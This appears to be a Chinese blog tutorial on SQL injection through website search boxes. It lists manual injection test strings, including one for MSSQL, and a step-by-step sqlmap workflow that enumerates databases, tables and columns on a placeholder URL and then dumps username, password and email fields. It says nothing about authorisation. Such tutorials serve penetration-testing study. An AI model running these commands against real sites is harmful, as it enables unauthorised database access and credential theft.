SQL注入实战— SQLMap之搜索框注入


当你的才华

还撑不起你的野心时

那你就应该静下心来学习


目录

Sqlmap之搜索框注入

方法


Sqlmap之搜索框注入

 

搜索框注入感觉和post注入简直一模一样,只不过形式是注入搜索框而不是username()或password()

 

方法:

sqlmap.py -u “http://xxxxxx.com/search.php(asp,aspx,jsp)” --data=”抓包到的搜索框的信息” -p “指定搜索框里面的一个参数值”

一个搜索框注入,如图所示:

SQL注入实战— SQLMap之搜索框注入_第1张图片

搜索框注入手工判断:' and 1=1 and '%'=' 返回所以结果 ' and 1=2 and '%'=' 无返回结果 ' and exists (select * from sysobjects) and '%'=' 返回正常 //最后一个针对于mssql数据库百度了下:

 

SQL注入实战— SQLMap之搜索框注入_第2张图片

系统对象表,针对于sql server(Mssql)数据库

 

一次sqlmap注入某注入点并且dump出账号密码全程

 

判断注入点:sqlmap.py -u “存在注入url”

 

爆出所有数据库名字:sqlmap.py -u “存在注入url” --dbs

 

查看当前使用账号:sqlmap.py -u “存在注入url” --current-user

 

//打**的是关键看我下面的四步走

 

1、**查看当前数据库:sqlmap.py -u “存在注入url” --current-db

 

2、**列出数据库中所有表:sqlmap.py -u “存在注入url” --tables,除了这样也可以这样整,如下所示:sqlmap.py -u “存在注入url” -D “当前数据库名” --tables //解释说明:-D是指定数据库名称。

 

3、**-T是指定列要出字段的表,就是数据库中的表名。列出数据库中的表中的字段:sqlmap.py -u “存在注入url” -D “当前数据库名” -T “数据库中的随意一张表(选取表需要自己判断)” --columns。

 

4、**跑出来表中的字段然后暴力拆解账号和密码,一般字段账号密码都是user/pass/password/username/keyword这些等等,自己找敏感的字段然后进行拆解。

 

-C指定要暴力拆解的字段

 

暴力拆解账号密码:sqlmap.py -u “存在注入url ” -D “当前数据库名” -T “数据库中的随意一张表(选取表需要自己判断)” 

-C “username,password,email(columns(字段)中疑似网站账号密码邮箱等敏感字段,举例子说明)” --dump

 

--dump将结果导出。

 

四步走有异曲同工之处,不管是什么方式的注入他们的方法都不会变


我不需要自由,只想背着她的梦

一步步向前走,她给的永远不重


 

你可能感兴趣的:(SQL注入,渗透测试,SQLMap)